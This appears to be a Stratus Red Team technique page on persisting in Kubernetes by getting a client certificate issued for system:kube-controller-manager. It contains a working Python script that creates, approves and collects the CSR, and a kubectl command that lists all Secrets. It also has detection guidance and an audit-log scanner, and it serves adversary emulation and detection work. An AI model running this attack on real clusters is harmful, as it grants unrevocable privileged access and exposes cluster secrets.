
Create Client Certificate Credential

idempotent

Platform: Kubernetes

MITRE ATT&CK Tactics

  • Persistence

Description

Creates a client certificate for a privileged user by submitting a CertificateSigningRequest (CSR) to the cluster's built-in signer. The resulting certificate and private key authenticate to the API server as that user without depending on a Secret, service account token or external identity provider, and Kubernetes has no certificate revocation mechanism, so the credential remains valid until it expires even if the attacker's original access is cut off.

Warm-up: None

Detonation:

  • Create a certificate signing request (CSR)
  • Wait for the CSR to be picked up and return a certificate
  • Print the client-side certificate and private key

Note: This attack technique does not succeed on AWS EKS. Due to apparent undocumented behavior, the managed EKS control plane does not issue a certificate for the certificate signing request (CSR), even after it is approved. It is still relevant to simulate the attacker behavior, since the CSR creation and approval are what a detection would see.

Note: The certificate is issued to system:kube-controller-manager, i.e. the CSR's subject CN is set to that name, which the API server maps directly to the username. This identity exists in most clusters and already has a ClusterRoleBinding to ClusterRole/system:kube-controller-manager, which includes privileged permissions such as reading all Secrets in the cluster and creating tokens for any service account. Once issued, the attacker's activity shows up in audit logs under that username, blending in with the controller manager's own requests.
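The three detonation steps above, written out as an added example (this is not Stratus Red Team's own code). It generates a key and a CSR whose subject CN is system:kube-controller-manager, wraps it in a certificates.k8s.io/v1 CertificateSigningRequest object for the kubernetes.io/kube-apiserver-client signer, submits and approves it with kubectl, then polls status.certificate. Assumptions: the `cryptography` package is installed, `kubectl` is on PATH with a context allowed to create and approve CSRs, and the object name `stratus-example-csr` is a placeholder chosen here. On EKS the poll times out, which is the behavior the note above describes.

```python
"""Create, approve and collect a kube-apiserver-client CSR for a privileged subject.

Added example, not Stratus Red Team's code. Assumes the `cryptography` package,
a working `kubectl`, and uses the placeholder CSR name below.
"""
import base64
import json
import subprocess
import time
from typing import Optional

SIGNER = "kubernetes.io/kube-apiserver-client"
TARGET_CN = "system:kube-controller-manager"  # CN becomes the Kubernetes username
CSR_NAME = "stratus-example-csr"              # placeholder object name (assumption)


def generate_key_and_csr(common_name: str = TARGET_CN, org=()):
    """Return (private_key_pem, csr_pem). CN maps to the username, each O to a group."""
    from cryptography import x509
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import rsa
    from cryptography.x509.oid import NameOID

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    attrs = [x509.NameAttribute(NameOID.COMMON_NAME, common_name)]
    attrs += [x509.NameAttribute(NameOID.ORGANIZATION_NAME, o) for o in org]
    csr = (x509.CertificateSigningRequestBuilder()
           .subject_name(x509.Name(attrs))
           .sign(key, hashes.SHA256()))
    key_pem = key.private_bytes(serialization.Encoding.PEM,
                                serialization.PrivateFormat.TraditionalOpenSSL,
                                serialization.NoEncryption())
    return key_pem, csr.public_bytes(serialization.Encoding.PEM)


def build_csr_manifest(csr_pem: bytes, name: str = CSR_NAME,
                       expiration_seconds: int = 86400) -> dict:
    """CertificateSigningRequest object; spec.request is the base64 of the PEM."""
    return {
        "apiVersion": "certificates.k8s.io/v1",
        "kind": "CertificateSigningRequest",
        "metadata": {"name": name},
        "spec": {
            "request": base64.b64encode(csr_pem).decode(),
            "signerName": SIGNER,
            "usages": ["client auth"],
            "expirationSeconds": expiration_seconds,
        },
    }


def extract_certificate(csr_object: dict) -> Optional[bytes]:
    """Issued certificate PEM from status.certificate, or None if not (yet) signed."""
    b64 = (csr_object.get("status") or {}).get("certificate")
    return base64.b64decode(b64) if b64 else None


def kubectl(*args, stdin: Optional[bytes] = None) -> bytes:
    return subprocess.run(["kubectl", *args], input=stdin, check=True,
                          capture_output=True).stdout


def detonate(timeout_s: int = 30):
    key_pem, csr_pem = generate_key_and_csr()
    manifest = json.dumps(build_csr_manifest(csr_pem)).encode()
    kubectl("apply", "-f", "-", stdin=manifest)      # step 1: create the CSR object
    kubectl("certificate", "approve", CSR_NAME)     # audit: update on csr/approval
    cert = None
    for _ in range(timeout_s):                       # step 2: wait for the signer
        obj = json.loads(kubectl("get", "csr", CSR_NAME, "-o", "json"))
        cert = extract_certificate(obj)
        if cert:
            break
        time.sleep(1)
    if cert is None:
        raise SystemExit("CSR approved but no certificate issued (expected on EKS)")
    print(cert.decode())                             # step 3: client cert and key
    print(key_pem.decode())


if __name__ == "__main__":
    detonate()
```

With the printed certificate and key saved to files, `kubectl --client-certificate=crt.pem --client-key=key.pem --server=<api-server> get secrets -A` confirms the identity works; the API server trusts the certificate because it was issued by the cluster CA, not because of any object that remains in the cluster (the CSR can be deleted afterwards).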

Instructions

Detonate with Stratus Red Team
stratus detonate k8s.persistence.create-client-certificate

Detection

Using Kubernetes API server audit logs. In particular, look for `create` requests on certificatesigningrequests and `update` requests on the `approval` subresource that do not relate to standard cluster operation. Routine kubelet certificate issuance uses the kubernetes.io/kube-apiserver-client-kubelet and kubernetes.io/kubelet-serving signers, is requested by node or bootstrap-token identities and is approved by the controller manager; a CSR for the kubernetes.io/kube-apiserver-client signer, especially one whose subject names a privileged identity and which is approved by a regular user or service account, is a strong signal. Capture the request body (audit level RequestResponse for this resource) so the signer name and usages are visible in the log.
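The detection logic above as an added example, run over constructed audit.k8s.io/v1 events (not real log data and not part of the original page): kubelet bootstrap and its auto-approval by the controller manager are treated as routine, while CSR creation for the kube-apiserver-client signer and approval by anyone other than the controller manager are flagged. The usernames and CSR names in the sample lines are made up.

```python
"""Flag CSR creation/approval in API server audit logs outside kubelet issuance.

Added example, not Stratus Red Team's code. Sample audit lines are constructed.
"""
import json
from typing import Iterable, List, Optional

KUBELET_SIGNERS = {
    "kubernetes.io/kube-apiserver-client-kubelet",  # kubelet client certs
    "kubernetes.io/kubelet-serving",                # kubelet serving certs
}
KUBELET_REQUESTER_GROUPS = {"system:nodes", "system:bootstrappers"}
CONTROLLER_MANAGER = "system:kube-controller-manager"  # auto-approves kubelet CSRs


def is_csr_event(ev: dict) -> bool:
    ref = ev.get("objectRef") or {}
    return (ref.get("apiGroup") == "certificates.k8s.io"
            and ref.get("resource") == "certificatesigningrequests"
            and ev.get("stage") == "ResponseComplete")


def classify(ev: dict) -> Optional[str]:
    """Return a finding for a suspicious CSR event, or None."""
    if not is_csr_event(ev):
        return None
    ref = ev["objectRef"]
    user = ev.get("user") or {}
    username, groups = user.get("username"), set(user.get("groups", []))
    spec = ((ev.get("requestObject") or {}).get("spec")) or {}
    signer = spec.get("signerName")
    name = ref.get("name", "?")
    if (ev.get("responseStatus") or {}).get("code", 0) >= 400:
        return None  # rejected requests: alert separately, not as issuance
    if ev.get("verb") == "create" and not ref.get("subresource"):
        if signer in KUBELET_SIGNERS and groups & KUBELET_REQUESTER_GROUPS:
            return None  # kubelet bootstrap or rotation
        return f"CSR {name} created by {username} for signer {signer} usages={spec.get('usages')}"
    if ev.get("verb") == "update" and ref.get("subresource") == "approval":
        if username == CONTROLLER_MANAGER and signer in KUBELET_SIGNERS:
            return None  # controller manager approving a kubelet CSR
        return f"CSR {name} approved by {username} for signer {signer}"
    return None


def scan(lines: Iterable[str]) -> List[str]:
    return [f for f in (classify(json.loads(l)) for l in lines if l.strip()) if f]


# Constructed audit events (one JSON object per line, audit.k8s.io/v1 Event fields).
SAMPLE_AUDIT_LINES = [
    # routine: node bootstrap CSR, then auto-approval by the controller manager
    '{"stage":"ResponseComplete","verb":"create","user":{"username":"system:bootstrap:abcdef",'
    '"groups":["system:bootstrappers","system:authenticated"]},"objectRef":{"resource":'
    '"certificatesigningrequests","apiGroup":"certificates.k8s.io","name":"csr-7x2kp"},'
    '"requestObject":{"spec":{"signerName":"kubernetes.io/kube-apiserver-client-kubelet",'
    '"usages":["client auth"]}},"responseStatus":{"code":201}}',
    '{"stage":"ResponseComplete","verb":"update","user":{"username":"system:kube-controller-manager",'
    '"groups":["system:authenticated"]},"objectRef":{"resource":"certificatesigningrequests",'
    '"apiGroup":"certificates.k8s.io","name":"csr-7x2kp","subresource":"approval"},'
    '"requestObject":{"spec":{"signerName":"kubernetes.io/kube-apiserver-client-kubelet"}},'
    '"responseStatus":{"code":200}}',
    # this technique: a regular user requests and approves a kube-apiserver-client cert
    '{"stage":"ResponseComplete","verb":"create","user":{"username":"alice@example.com",'
    '"groups":["system:authenticated"]},"objectRef":{"resource":"certificatesigningrequests",'
    '"apiGroup":"certificates.k8s.io","name":"stratus-example-csr"},"requestObject":{"spec":'
    '{"signerName":"kubernetes.io/kube-apiserver-client","usages":["client auth"]}},'
    '"responseStatus":{"code":201}}',
    '{"stage":"ResponseComplete","verb":"update","user":{"username":"alice@example.com",'
    '"groups":["system:authenticated"]},"objectRef":{"resource":"certificatesigningrequests",'
    '"apiGroup":"certificates.k8s.io","name":"stratus-example-csr","subresource":"approval"},'
    '"requestObject":{"spec":{"signerName":"kubernetes.io/kube-apiserver-client"}},'
    '"responseStatus":{"code":200}}',
    # unrelated traffic
    '{"stage":"ResponseComplete","verb":"get","user":{"username":"alice@example.com"},'
    '"objectRef":{"resource":"pods","namespace":"default","name":"web"},"responseStatus":{"code":200}}',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_AUDIT_LINES):
        print(finding)
```

Approval is the higher-confidence signal of the two: a CSR can be created by anyone with create permission, but approving one for a signer outside the kubelet set requires the `approve` verb on `signers` and is rarely exercised by humans or workloads in a healthy cluster.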